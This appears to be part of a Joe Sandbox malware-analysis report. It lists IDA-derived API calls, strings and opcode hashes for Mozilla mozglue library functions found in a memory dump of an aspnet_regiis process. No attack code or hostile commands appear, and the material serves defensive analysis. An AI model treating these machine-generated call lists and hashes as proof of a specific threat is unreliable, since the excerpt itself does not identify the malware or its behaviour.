                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3835517998-0
                                                                                                                            • Opcode ID: 1e3e338851f1bedcc55f479183720f18dcba606cd571e63a62ed04aad337759c
                                                                                                                            • Instruction ID: a701858f641fa34f46ec7df6202d3dd04354e9b9b71fd791431193b36f08630b
                                                                                                                            • Opcode Fuzzy Hash: 1e3e338851f1bedcc55f479183720f18dcba606cd571e63a62ed04aad337759c
                                                                                                                            • Instruction Fuzzy Hash: A021D3B1A0020C9FDB105F64EC0CAAE7BB8FF45318F048428E81A97641DB34A959CFE5
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC37EA7
                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6CC37EB3
                                                                                                                              • Part of subcall function 6CC3CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC3CB49
                                                                                                                              • Part of subcall function 6CC3CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC3CBB6
                                                                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC37EC4
                                                                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC37F19
                                                                                                                            • malloc.MOZGLUE(?), ref: 6CC37F36
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC37F4D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 204725295-2564639436
                                                                                                                            • Opcode ID: 48dc5d7b538a2e6504da8fc5564c69b7560657ccc7dd38ae91e61ac4e416cbd4
                                                                                                                            • Instruction ID: b6dcc53884d683cba53b9b5248040462c1e830c6666f060c0527ae2cf06f3468
                                                                                                                            • Opcode Fuzzy Hash: 48dc5d7b538a2e6504da8fc5564c69b7560657ccc7dd38ae91e61ac4e416cbd4
                                                                                                                            • Instruction Fuzzy Hash: 5E311661E0075897DB009F68DC445FEB778FF96308F445269EC49A7612FB30A9D8C391
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CC33EEE
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC33FDC
                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CC34006
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC340A1
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC340AF
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC340C2
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC34134
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC34143
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC34157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3680524765-0
                                                                                                                            • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                            • Instruction ID: 401fbf9655206fca6f7a9042c99cf8c990a24a76915c36e37a910b71f5896e48
                                                                                                                            • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                            • Instruction Fuzzy Hash: 60A1A2B1A00215CFDB40CF29D880659BBB5FF48308F695199D909AF752E776D886CFA0
                                                                                                                            APIs
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC78273), ref: 6CC79D65
                                                                                                                            • free.MOZGLUE(6CC78273,?), ref: 6CC79D7C
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC79D92
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC79E0F
                                                                                                                            • free.MOZGLUE(6CC7946B,?,?), ref: 6CC79E24
                                                                                                                            • free.MOZGLUE(?,?,?), ref: 6CC79E3A
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC79EC8
                                                                                                                            • free.MOZGLUE(6CC7946B,?,?,?), ref: 6CC79EDF
                                                                                                                            • free.MOZGLUE(?,?,?,?), ref: 6CC79EF5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 956590011-0
                                                                                                                            • Opcode ID: 4331b52c6abdb45f14a813c0fbbd72a45a8848134d848e6902030819072101cd
                                                                                                                            • Instruction ID: d149bbe3daaaa7d070e19d35c3ce0ef270e7a8f5caff7dfa78f92585e052077c
                                                                                                                            • Opcode Fuzzy Hash: 4331b52c6abdb45f14a813c0fbbd72a45a8848134d848e6902030819072101cd
                                                                                                                            • Instruction Fuzzy Hash: 6971ADB0909B418BC722CF18C48095BF3F4FF99324B44C659E89A5BB02FB30E885CB91
                                                                                                                            APIs
                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC7DDCF
                                                                                                                              • Part of subcall function 6CC5FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC5FA4B
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC790FF
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC79108
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DE0D
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC7DE41
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DE5F
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DEA3
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DEE9
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC6DEFD,?,6CC34A68), ref: 6CC7DF32
                                                                                                                              • Part of subcall function 6CC7DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC7DB86
                                                                                                                              • Part of subcall function 6CC7DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC7DC0E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC6DEFD,?,6CC34A68), ref: 6CC7DF65
                                                                                                                            • free.MOZGLUE(?), ref: 6CC7DF80
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 112305417-0
                                                                                                                            • Opcode ID: 09c4645ba257723d4e9acc920a76063ecbca225e5ce7674cea0d0985a26e82f0
                                                                                                                            • Instruction ID: 0206addafb621cbb305aa9cda32c4f20c20eecace6f7d87745a51b68b84d49c6
                                                                                                                            • Opcode Fuzzy Hash: 09c4645ba257723d4e9acc920a76063ecbca225e5ce7674cea0d0985a26e82f0
                                                                                                                            • Instruction Fuzzy Hash: B351D6726016019BD7329F29D8806AFB3B6FF95318F95411DD85A53B00F731F85ACBA2
                                                                                                                            APIs
                                                                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D32
                                                                                                                            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D62
                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D6D
                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D84
                                                                                                                            • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85DA4
                                                                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85DC9
                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC85DDB
                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85E00
                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85E45
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325513730-0
                                                                                                                            • Opcode ID: 00d94c3cda4e32344d49db7c7cd43804de61fc005d938b1ee2cb5b1f4ef4b58a
                                                                                                                            • Instruction ID: bc081d787588725004d19f22211d88113041eaaf862d3bb0093748e5dd6c5541
                                                                                                                            • Opcode Fuzzy Hash: 00d94c3cda4e32344d49db7c7cd43804de61fc005d938b1ee2cb5b1f4ef4b58a
                                                                                                                            • Instruction Fuzzy Hash: DB419270B012098FDB10DFA5D99CAAE7BB5EF49318F0440A9D90697781FB74E805CB61
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC231A7), ref: 6CC5CDDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                            • API String ID: 4275171209-2186867486
                                                                                                                            • Opcode ID: 960cf3a35980ae80110229332364e6c9429e5184942e48ba38720d67822af9c6
                                                                                                                            • Instruction ID: bfcb1269cdbc8c2f1e6f7b99c58356a59198f5d4dc79cfe484adfaf6dc31ae6e
                                                                                                                            • Opcode Fuzzy Hash: 960cf3a35980ae80110229332364e6c9429e5184942e48ba38720d67822af9c6
                                                                                                                            • Instruction Fuzzy Hash: EA31A7307402095BEB00AFA58C59B6E7775BF49754F644119F510ABAC0FBB1D4318B99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC2F100: LoadLibraryW.KERNEL32(shell32,?,6CC9D020), ref: 6CC2F122
                                                                                                                              • Part of subcall function 6CC2F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC2F132
                                                                                                                            • moz_xmalloc.MOZGLUE(00000012), ref: 6CC2ED50
                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC2EDAC
                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC2EDCC
                                                                                                                            • CreateFileW.KERNEL32 ref: 6CC2EE08
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC2EE27
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC2EE32
                                                                                                                              • Part of subcall function 6CC2EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC2EBB5
                                                                                                                              • Part of subcall function 6CC2EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CC5D7F3), ref: 6CC2EBC3
                                                                                                                              • Part of subcall function 6CC2EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CC5D7F3), ref: 6CC2EBD6
                                                                                                                            Strings
                                                                                                                            • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC2EDC1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                            • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                            • API String ID: 1980384892-344433685
                                                                                                                            • Opcode ID: d37819a37f3f9db348c0f4e5b30c634744cb15c48c814e3f928df235eed3a46f
                                                                                                                            • Instruction ID: 3e8f221d28141a1b156eb86acbf99e4619bacdb1d1c8147247f41024a0b2f895
                                                                                                                            • Opcode Fuzzy Hash: d37819a37f3f9db348c0f4e5b30c634744cb15c48c814e3f928df235eed3a46f
                                                                                                                            • Instruction Fuzzy Hash: DE51CF71D052188BDB00DF79D8446EEB7B0AF59319F44852DE8557B780FB38A988CBE2
                                                                                                                            APIs
                                                                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC9A565
                                                                                                                              • Part of subcall function 6CC9A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A4BE
                                                                                                                              • Part of subcall function 6CC9A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC9A4D6
                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC9A65B
                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC9A6B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                            • String ID: 0$z
                                                                                                                            • API String ID: 310210123-2584888582
                                                                                                                            • Opcode ID: 2ce7c9f891e6afbfec308a7292ebcb0ae6d8fe7b5fdb1317a086a7ebb6bf2029
                                                                                                                            • Instruction ID: 3b05efe73b375843cc99fab3e17bda5048e33b64ecb59c3c9a75ae2c5b4c8fdf
                                                                                                                            • Opcode Fuzzy Hash: 2ce7c9f891e6afbfec308a7292ebcb0ae6d8fe7b5fdb1317a086a7ebb6bf2029
                                                                                                                            • Instruction Fuzzy Hash: 38411671A097459FC341DF29C480A9FBBE5BFC9354F408A2EF49987650EB30E649CB92
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            Strings
                                                                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC6946B
                                                                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC6947D
                                                                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC69459
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                            • API String ID: 4042361484-1628757462
                                                                                                                            • Opcode ID: 2a6a232e1a7eeafe5e36bce4fda6db2ecffc41a810b0b7b495762980e0d8dd92
                                                                                                                            • Instruction ID: 4fb53ab997b793cca17d77852ca1ea9240583fb51155ab8adcc1f99cb8d76e3b
                                                                                                                            • Opcode Fuzzy Hash: 2a6a232e1a7eeafe5e36bce4fda6db2ecffc41a810b0b7b495762980e0d8dd92
                                                                                                                            • Instruction Fuzzy Hash: 4401AC70A001028FD7109BDFE95DA6E33B5AB46369F040537ED06C7F51F631D8668A9B
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC70F6B
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC70F88
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC70FF7
                                                                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC71067
                                                                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC710A7
                                                                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC7114B
                                                                                                                              • Part of subcall function 6CC68AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC81563), ref: 6CC68BD5
                                                                                                                            • free.MOZGLUE(?), ref: 6CC71174
                                                                                                                            • free.MOZGLUE(?), ref: 6CC71186
                                                                                                                            Similarity
                                                                                                                            • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803333873-0
                                                                                                                            • Opcode ID: 852862184fc52ac8261c51add03f5e0e6c5fdbbd424bdbe937571f31ef98b640
                                                                                                                            • Instruction ID: e9acecb0d87826ea9c3ebe215098acadf45b7c50dc335e4d0bbb5c399ac922e9
                                                                                                                            • Opcode Fuzzy Hash: 852862184fc52ac8261c51add03f5e0e6c5fdbbd424bdbe937571f31ef98b640
                                                                                                                            • Instruction Fuzzy Hash: 0B619A76A043449FDB20CF25D894B9AB7F5FFC5308F04891DE89997611EB31E849CBA2
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B6AC
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B6D1
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B6E3
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B70B
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B71D
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CC2B61E), ref: 6CC2B73F
                                                                                                                            • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B760
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B79A
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1394714614-0
                                                                                                                            • Opcode ID: 2dbed6493390af19f96abc2d12c8258e9970ec4a1dedf0ff720c44324a2c7546
                                                                                                                            • Instruction ID: a057157b5c77745d150b1d0cbc3f377d55df30d06024b96c4f8e8b7183f76dc5
                                                                                                                            • Opcode Fuzzy Hash: 2dbed6493390af19f96abc2d12c8258e9970ec4a1dedf0ff720c44324a2c7546
                                                                                                                            • Instruction Fuzzy Hash: 5E41B3B2D001159FCB04DF69DC90AAEB7B5BF44324F250629E866E7780F735E90487E1
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(6CCA5104), ref: 6CC2EFAC
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC2EFD7
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC2EFEC
                                                                                                                            • free.MOZGLUE(?), ref: 6CC2F00C
